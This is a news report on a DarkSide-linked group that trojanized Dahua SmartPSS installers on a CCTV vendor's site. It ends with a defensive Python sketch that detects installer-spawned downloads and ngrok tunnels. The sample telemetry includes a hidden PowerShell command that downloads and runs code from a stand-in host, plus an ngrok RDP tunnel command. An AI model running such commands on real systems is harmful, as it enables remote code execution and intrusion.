17 June 2021

DarkSide affiliates shift to software supply chain attacks


A hacker group believed to be one of the affiliates of the DarkSide ransomware operation targeted at least one victim via a malicious software installer downloaded from a legitimate website, Mandiant revealed.

Tracked as UNC2465, the group compromised the website of a CCTV camera vendor and planted malware in the Dahua SmartPSS Windows app, software used to manage security surveillance devices, that the company provided to its customers. The CCTV camera vendor's website was breached on May 18, and the trojanized downloads remained available until early June, when the malware was detected, Mandiant said.

According to the researchers, UNC2465 likely trojanized two software install packages hosted on the CCTV security camera provider's website, and gained access to the victim when an unsuspecting user in the affected organization followed the link and downloaded the ZIP file.

“Upon installing the software, a chain of downloads and scripts were executed, leading to SMOKEDHAM and later NGROK on the victim’s computer. Additional malware use such as BEACON, and lateral movement also occurred. Mandiant believes the Trojanized software was available from May 18, 2021, through June 8, 2021,” Mandiant explained.

The security firm attributed the breach of the CCTV vendor's official website to UNC2465 based on the use of SMOKEDHAM, a backdoor that had previously been observed only in UNC2465 intrusions.

While ransomware was not deployed in this case, Mandiant believes that "affiliate groups that have conducted DarkSide intrusions may use multiple ransomware affiliate programs and can switch between them at will."

“Ransomware groups continue to adapt and pursue opportunistic access to victims. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection,” the company said.

“While many organizations are now focusing more on perimeter defenses and two-factor authentication after recent public examples of password reuse or VPN appliance exploitation, monitoring on endpoints is often overlooked or left to traditional antivirus. A well-rounded security program is essential to mitigate risk from sophisticated groups such as UNC2465 as they continue to adapt to a changing security landscape.”
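As an added illustration of the endpoint monitoring Mandiant argues is overlooked, the following Python sketch (written for this page; it is not Mandiant's, Dahua's or the vendor's code) runs two detections over process-creation telemetry for the chain described above: a script host that descends from a software installer and whose command line fetches more code, and an ngrok tunnel being started on the endpoint. The event records, host paths, user name, installer filename and URL are all constructed for the example, and the installer and download heuristics are assumptions, not indicators from the actual intrusion.

```python
"""Endpoint detection sketch for the installer -> script -> tunnel chain.

Runs over constructed process-creation events whose fields mirror Sysmon
Event ID 1 (pid, ppid, image, cmdline). Not Mandiant's detection logic.
"""
import re

# Script hosts a software installer has no business spawning to fetch more code.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Assumed heuristics: command-line fragments that indicate a download stage.
DOWNLOAD_RE = re.compile(
    r"https?://|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
    r"Net\.WebClient|bitsadmin|certutil.*-urlcache|\bcurl\b|\bwget\b",
    re.IGNORECASE)
# Assumed: installers are recognised by image name only (setup/install/msiexec).
INSTALLER_RE = re.compile(r"setup|install|msiexec", re.IGNORECASE)
# ngrok started as a tunnel, whether or not the binary kept its name.
NGROK_RE = re.compile(r"\bngrok(\.exe)?\s+(tcp|http|tls|start)\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(event, by_pid, max_depth=6):
    """Yield parent, grandparent, ... (PIDs assumed unique within the window)."""
    seen = {event["pid"]}
    cur = by_pid.get(event["ppid"])
    while cur and cur["pid"] not in seen and len(seen) <= max_depth:
        yield cur
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])


def process_chain(event, by_pid):
    """Root-to-leaf list of image basenames, for the analyst's benefit."""
    chain = [basename(a["image"]) for a in ancestors(event, by_pid)]
    chain.reverse()
    chain.append(basename(event["image"]))
    return chain


def detect(events):
    """Return a finding per event that matches one of the two rules."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["image"])
        # Rule 1: a script host under an installer, with a download in its command line.
        if img in SCRIPT_HOSTS and DOWNLOAD_RE.search(e["cmdline"]):
            installer = next((a for a in ancestors(e, by_pid)
                              if INSTALLER_RE.search(basename(a["image"]))), None)
            if installer:
                findings.append({"rule": "installer_spawned_download", "pid": e["pid"],
                                 "installer_pid": installer["pid"],
                                 "chain": process_chain(e, by_pid)})
        # Rule 2: ngrok tunnel on the endpoint (allowlist hosts where it is sanctioned).
        if img == "ngrok.exe" or NGROK_RE.search(e["cmdline"]):
            findings.append({"rule": "ngrok_tunnel", "pid": e["pid"],
                             "chain": process_chain(e, by_pid)})
    return findings


# Constructed sample telemetry: hypothetical user, paths, installer name and URL.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Users\jdoe\Downloads\CameraTool_Setup.exe",
     "cmdline": r'"C:\Users\jdoe\Downloads\CameraTool_Setup.exe"'},
    {"pid": 4131, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\jdoe\AppData\Local\Temp\post.bat"'},
    {"pid": 4140, "ppid": 4131,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://stage.example.invalid/a')\""},
    {"pid": 4210, "ppid": 4140, "image": r"C:\Users\jdoe\AppData\Local\Temp\ngrok.exe",
     "cmdline": "ngrok.exe tcp 3389"},
    # Benign noise: an administrator running PowerShell from the desktop.
    {"pid": 5100, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["rule"], f["pid"], " -> ".join(f["chain"]))
```

Rule 1 walks up the process tree rather than checking only the direct parent, because an installer commonly hands off to cmd.exe before PowerShell runs; the second rule is deliberately broad and should be paired with an allowlist on hosts where ngrok is sanctioned.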
